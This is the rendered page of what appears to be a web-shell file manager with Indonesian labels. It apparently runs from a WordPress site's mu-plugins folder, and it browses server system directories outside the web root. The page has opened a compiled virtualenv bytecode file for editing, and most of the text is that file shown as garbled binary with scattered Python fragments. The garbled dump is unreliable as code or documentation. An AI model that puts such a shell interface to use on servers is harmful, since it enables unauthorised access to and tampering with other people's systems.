📂 Advanced File Manager
Multi-Root Navigation System
⚡ Quick Jump
Server (/)
Home (/home)
Var_www (/var/www)
Current (/home4/shelley/public_html/wp-content/mu-plugins)
📍 Go
⬆ Ke Atas
🏠 Root Server
🏠 Root App
🔄 Refresh
📀 /
›
usr
›
lib
›
python3.9
›
site-packages
›
virtualenv
›
app_data
›
📁 __pycache__
📍
Lokasi:
/usr/lib/python3.9/site-packages/virtualenv/app_data/__pycache__
💾
Free:
45.4 GB
⚠️ Direktori ini
tidak writable
.
✏️ Mengedit: base.cpython-39.opt-1.pyc
a ��:i � @ s\ d Z ddlmZmZ ddlmZ ddlmZ G dd� ded�ZG dd � d ed�Z d dgZ d S )z( Application data stored by virtualenv. � )�ABCMeta�abstractmethod)�contextmanager)� IS_ZIPAPPc @ s� e Zd ZdZedd� �Zedd� �Zedd� �Zedd � �Ze d d� �Z edd � �Ze dd� �Ze dd� �Z edd� �Zeddd��Zeedd� ��Zeedd� ��ZdS )�AppDataz9Abstract storage interface for the virtualenv applicationc C s dS )zcalled before virtualenv exitsN� ��selfr r �</usr/lib/python3.9/site-packages/virtualenv/app_data/base.py�close s z AppData.closec C s dS )z1called when the user passes in the reset app dataNr r r r r �reset s z AppData.resetc C s t �d S �N��NotImplementedError�r �pathr r r �py_info s zAppData.py_infoc C s t �d S r r r r r r � py_info_clear s zAppData.py_info_clearc C s t �d S r r r r r r � can_update s zAppData.can_updatec C s t �d S r r )r Zdistribution�for_py_versionr r r �embed_update_log"